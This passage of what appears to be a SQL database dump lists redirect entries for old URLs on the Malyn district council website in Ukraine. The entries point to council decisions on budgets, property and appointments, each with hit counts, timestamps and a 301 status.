00:00:00',301),(15927,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/9-pro-zminu-nazvi-ta-zatverdzhennja-polozhennja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:21:16','0000-00-00 00:00:00',301),(15928,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/125-porjadok-dennij-4-sesii-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:18','0000-00-00 00:00:00',301),(15929,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/126-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:20','0000-00-00 00:00:00',301),(15930,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/127-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:21:21','0000-00-00 00:00:00',301),(15931,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/128-pro-zatverdzhennja-rozmiru-vartosti-produktiv','','','',18,0,'2015-10-31 23:21:23','0000-00-00 00:00:00',301),(15932,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/129-pro-rozpodil-vikoristannja-koshtiv-shho-nadhodjat?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:24','0000-00-00 00:00:00',301),(15933,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/81-rishennja-prijnjati-na-4-sesii-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:26','0000-00-00 00:00:00',301),(15934,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 23:21:28','0000-00-00 00:00:00',301),(15935,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1125-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:21:29','0000-00-00 00:00:00',301),(15936,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/859-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:21:31','0000-00-00 00:00:00',301),(15937,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/860-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:21:32','0000-00-00 00:00:00',301),(15938,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/865-pro-vnesennya-zmin-do-pereliku-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:33','0000-00-00 00:00:00',301),(15939,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/866-pro-pogodzhennya-zvilnennya-ta-priznachennya-na-posadi-direktoriv-shkil-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:35','0000-00-00 00:00:00',301),(15940,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/867-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-15-grudnya-2010-roku-12-pro-utvorennya-prezidiji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:21:36','0000-00-00 00:00:00',301),(15941,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/868-pro-peredachu-nerukhomogo-majna','','','',29,0,'2015-10-31 23:21:38','0000-00-00 00:00:00',301),(15942,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/869-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:21:39','0000-00-00 00:00:00',301),(15943,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014?limitstart=0','','','',14,0,'2015-10-31 23:21:41','0000-00-00 00:00:00',301),(15944,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:21:44','0000-00-00 00:00:00',301),(15945,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:47','0000-00-00 00:00:00',301),(15946,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:49','0000-00-00 00:00:00',301),(15947,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:21:50','0000-00-00 00:00:00',301),(15948,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1100-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:21:52','0000-00-00 00:00:00',301),(15949,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku?start=7','','','',17,0,'2015-10-31 23:21:57','0000-00-00 00:00:00',301),(15950,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:58','0000-00-00 00:00:00',301),(15951,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:22:00','0000-00-00 00:00:00',301),(15952,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:22:01','0000-00-00 00:00:00',301),(15953,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:22:03','0000-00-00 00:00:00',301),(15954,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1045-pro-zatverdzhennya-statutu-redaktsiji-gazeti-malinski-novini-v-novij-redaktsiji?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:22:04','0000-00-00 00:00:00',301),(15955,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1048-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:22:06','0000-00-00 00:00:00',301),(15956,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1049-pro-zatverdzhennya-redaktora-gazeti-malinski-novini?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:22:07','0000-00-00 00:00:00',301),(15957,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1051-pro-zakhodi-shchodo-zberezhennya-isnuyuchoji-merezhi-avtomobilnikh-dorig-rajonu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:22:09','0000-00-00 00:00:00',301),(15958,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1052-pro-dostrokove-pripinennya-povnovazhen-zastupnika-golovi-rajonnoji-radi-levkovtsya-m-s?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:22:11','0000-00-00 00:00:00',301),(15959,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1053-pro-zvernennya-do-zhitomirskoji-oblasnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:22:12','0000-00-00 00:00:00',301),(15960,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1056-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:22:14','0000-00-00 00:00:00',301),(15961,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1060-pro-zvernennya-do-derzhavnogo-agentstva-avtomobilnikh-dorig-ukrajini?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-10-31 23:22:15','0000-00-00 00:00:00',301),(15962,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku?start=14','','','',19,0,'2015-10-31 23:22:20','0000-00-00 00:00:00',301),(15963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=913:-l-28r-&catid=36&Itemid=70&lang=ru','','','',1,0,'2015-10-31 23:30:46','0000-00-00 00:00:00',301),(15964,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1022-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',72,0,'2015-11-01 00:20:49','0000-00-00 00:00:00',301),(15967,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/870-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-naftova-budivelna-','','','',1,0,'2015-11-01 01:02:41','0000-00-00 00:00:00',301),(15968,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1053-pro-zvernennya-do-zhitomirskoji-oblasnoji-radi','','','',7,0,'2015-11-01 01:15:19','0000-00-00 00:00:00',301),(15969,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/557-pro-zatverdzhennja-rozporjadzhennja-golovi','','','',21,0,'2015-11-01 01:26:58','0000-00-00 00:00:00',301),(15970,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&lang=ru&option=com_content&view=article','','','',17,0,'2015-11-01 01:29:27','0000-00-00 00:00:00',301),(15971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:-2012-2015-&catid=38:--19122011-&Itemid=73&lang=uk','','','',3,0,'2015-11-01 01:33:45','0000-00-00 00:00:00',301),(15972,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=14','','http://go.mail.ru/search_images','',49,0,'2015-11-01 02:16:03','0000-00-00 00:00:00',301),(15974,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/925-pro-nadannya-dozvolu-na-vlashtuvannya-rudenko-k-v-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odi','','','',1,0,'2015-11-01 02:54:43','0000-00-00 00:00:00',301),(15975,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/934-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-kori','','','',1,0,'2015-11-01 02:54:44','0000-00-00 00:00:00',301),(15976,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku?start=14','','','',39,0,'2015-11-01 02:54:44','0000-00-00 00:00:00',301),(15977,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku?start=7','','','',13,0,'2015-11-01 02:54:44','0000-00-00 00:00:00',301),(15978,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1012-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki','','','',30,0,'2015-11-01 02:54:45','0000-00-00 00:00:00',301),(15979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8:2010-06-05-12-54-02&Itemid=13&lang=uk','','','',1,0,'2015-11-01 02:54:51','0000-00-00 00:00:00',301),(15980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8&Itemid=13&lang=uk','','','',1,0,'2015-11-01 02:54:52','0000-00-00 00:00:00',301),(15981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1050:2013-07-15-13-52-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-11-01 02:54:54','0000-00-00 00:00:00',301),(15982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=208:2010-12-15-14-26-03&catid=29:--15122010-&Itemid=60&lang=uk','','','',2,0,'2015-11-01 02:55:14','0000-00-00 00:00:00',301),(15983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31:-25032011&Itemid=62&lang=uk','','','',30,0,'2015-11-01 02:55:15','0000-00-00 00:00:00',301),(15984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=359:2011-06-30-11-10-42&catid=35&Itemid=69&lang=uk','','','',4,0,'2015-11-01 02:55:15','0000-00-00 00:00:00',301),(15985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=449:2011-10-28-08-04-47&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-11-01 02:55:15','0000-00-00 00:00:00',301),(15986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=450:-l-2011-2013-r&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-01 02:55:15','0000-00-00 00:00:00',301),(15987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=452:-20-2011-100-l-r-&catid=38&Itemid=73&lang=uk','','','',9,0,'2015-11-01 02:55:16','0000-00-00 00:00:00',301),(15988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=490:2011-12-02-09-02-47&catid=38&Itemid=73&lang=uk','','','',4,0,'2015-11-01 02:55:18','0000-00-00 00:00:00',301),(15989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-01 02:55:18','0000-00-00 00:00:00',301),(15990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=519:-2011-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=uk','','','',6,0,'2015-11-01 02:55:18','0000-00-00 00:00:00',301),(15991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-01 02:55:19','0000-00-00 00:00:00',301),(15992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&Itemid=14&lang=uk','','','',8,0,'2015-11-01 02:55:19','0000-00-00 00:00:00',301),(15993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=542:-2011-&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-11-01 02:55:19','0000-00-00 00:00:00',301),(15994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=615:-------26032012495-12&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-01 02:55:21','0000-00-00 00:00:00',301),(15995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40:--28032012-&Itemid=77&lang=uk','','','',3,0,'2015-11-01 02:55:22','0000-00-00 00:00:00',301),(15996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-01 02:55:22','0000-00-00 00:00:00',301),(15997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=635:-2011-2015-&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2015-11-01 02:55:22','0000-00-00 00:00:00',301),(15998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&catid=42&Itemid=80&lang=uk','','','',2,0,'2015-11-01 02:55:24','0000-00-00 00:00:00',301),(15999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=678:----------------2012-2014-&catid=42&Itemid=80&lang=uk','','','',4,0,'2015-11-01 02:55:24','0000-00-00 00:00:00',301),(16000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-01 02:55:42','0000-00-00 00:00:00',301),(16001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=702:-2011-2013-&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-11-01 02:55:43','0000-00-00 00:00:00',301),(16002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:-2012-2015-&catid=45&Itemid=84&lang=uk','','','',2,0,'2015-11-01 02:55:46','0000-00-00 00:00:00',301),(16003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45&Itemid=84&lang=uk','','','',6,0,'2015-11-01 02:55:46','0000-00-00 00:00:00',301),(16004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-11-01 02:55:47','0000-00-00 00:00:00',301),(16005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=uk','','','',2,0,'2015-11-01 02:55:47','0000-00-00 00:00:00',301),(16006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-11-01 02:55:49','0000-00-00 00:00:00',301),(16007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-11-01 02:55:49','0000-00-00 00:00:00',301),(16008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=846:2012-12-10-14-06-00&catid=46&Itemid=85&lang=uk','','','',1,0,'2015-11-01 02:55:50','0000-00-00 00:00:00',301),(16009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru','','','',12,0,'2015-11-01 02:56:23','0000-00-00 00:00:00',301),(16010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=83&lang=en','','','',13,0,'2015-11-01 02:56:23','0000-00-00 00:00:00',301),(16011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=ru&limitstart=10','','','',1,0,'2015-11-01 02:56:23','0000-00-00 00:00:00',301),(16012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=en&limitstart=10','','','',2,0,'2015-11-01 02:56:23','0000-00-00 00:00:00',301),(16013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=en&limitstart=5','','','',3,0,'2015-11-01 02:56:24','0000-00-00 00:00:00',301),(16014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=ru&limitstart=15','','','',1,0,'2015-11-01 02:56:24','0000-00-00 00:00:00',301),(16015,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1089-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',14,0,'2015-11-01 02:57:19','0000-00-00 00:00:00',301),(16016,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1096-pro-peredachu-primishchennya-gorinskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-gorinskoji-silskoji-radi','','','',10,0,'2015-11-01 02:57:20','0000-00-00 00:00:00',301),(16017,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/703-pro-rajonnij-bjudzhet-na-2014-rik','','','',22,0,'2015-11-01 02:57:21','0000-00-00 00:00:00',301),(16018,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/450-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_4','','','',16,0,'2015-11-01 02:57:21','0000-00-00 00:00:00',301),(16019,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/452-pro-spisannja-osnovnih-zasobiv_3?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-01 02:57:22','0000-00-00 00:00:00',301),(16020,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',3,0,'2015-11-01 02:57:22','0000-00-00 00:00:00',301),(16021,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/384-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_2','','','',21,0,'2015-11-01 02:57:23','0000-00-00 00:00:00',301),(16022,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/189-rishennja-prijnjati-na-pozachergovij-6-sesii','','','',12,0,'2015-11-01 02:57:24','0000-00-00 00:00:00',301),(16023,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/188-pro-vnesennja-zmin-do-polozhennja-pro-konkursnij','','','',14,0,'2015-11-01 02:57:24','0000-00-00 00:00:00',301),(16024,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/320-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_4','','','',25,0,'2015-11-01 02:57:25','0000-00-00 00:00:00',301),(16025,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/543-pro-peredachu-traktora','','','',21,0,'2015-11-01 02:57:25','0000-00-00 00:00:00',301),(16026,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/545-pro-vnesennja-zmin-do-rajonnoi-cilovoi-programi','','','',39,0,'2015-11-01 02:57:25','0000-00-00 00:00:00',301),(16027,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/223-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_8','','','',13,0,'2015-11-01 02:57:26','0000-00-00 00:00:00',301),(16028,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-?limitstart=0','','','',7,0,'2015-11-01 02:57:43','0000-00-00 00:00:00',301),(16029,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/430-pro-programu-zabezpechennja-deputatskoi-dijalnosti_2','','','',38,0,'2015-11-01 02:57:44','0000-00-00 00:00:00',301),(16030,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/353-pro-likvidaciju-ustinivskoi-zosh-i-st','','','',38,0,'2015-11-01 02:57:45','0000-00-00 00:00:00',301),(16031,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/601-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_4','','','',85,0,'2015-11-01 02:57:45','0000-00-00 00:00:00',301),(16032,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/635-pro-nadannja-dozvolu-na-vlashtuvannja-rozgon-v-f','','','',26,0,'2015-11-01 02:57:45','0000-00-00 00:00:00',301),(16033,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/689-pro-zatverdzhennja-pereliku-zakladiv-kulturi','','','',22,0,'2015-11-01 02:57:46','0000-00-00 00:00:00',301),(16034,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/690-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_24','','','',30,0,'2015-11-01 02:57:47','0000-00-00 00:00:00',301),(16035,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/661-pro-priznachennja-direktora-komunalnogo','','','',27,0,'2015-11-01 02:57:47','0000-00-00 00:00:00',301),(16036,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/474-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_5','','','',21,0,'2015-11-01 02:57:48','0000-00-00 00:00:00',301),(16037,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=7','','','',23,0,'2015-11-01 02:57:49','0000-00-00 00:00:00',301),(16038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=ru','','','',53,0,'2015-11-01 03:16:35','0000-00-00 00:00:00',301),(16039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=50&Itemid=90&lang=uk','','','',11,0,'2015-11-01 03:29:43','0000-00-00 00:00:00',301),(16040,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=210:-2010-&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-01 03:30:04','0000-00-00 00:00:00',301),(16042,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1021-pro-zatverdzhennya-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib','','','',20,0,'2015-11-01 04:15:16','0000-00-00 00:00:00',301),(16044,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=50&layout=blog&Itemid=90&lang=uk','','','',1,0,'2015-11-01 04:17:29','0000-00-00 00:00:00',301),(16045,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/860-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv','','','',10,0,'2015-11-01 04:21:50','0000-00-00 00:00:00',301),(16046,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/488-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_9','','','',15,0,'2015-11-01 04:22:04','0000-00-00 00:00:00',301),(16047,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/680-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi_2','','','',12,0,'2015-11-01 04:23:28','0000-00-00 00:00:00',301),(16048,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/692-pro-zatverdzhennja-strukturi-ta-chiselnosti_2','','','',16,0,'2015-11-01 04:23:29','0000-00-00 00:00:00',301),(16049,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/357-pro-hid-vikonannja-rajonnoi-programi_6?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-01 04:23:31','0000-00-00 00:00:00',301),(16050,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/358-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_3','','','',12,0,'2015-11-01 04:23:32','0000-00-00 00:00:00',301),(16051,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/381-pro-peredachu-neruhomogo-majna-shho-perebuvae-u_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-01 04:23:34','0000-00-00 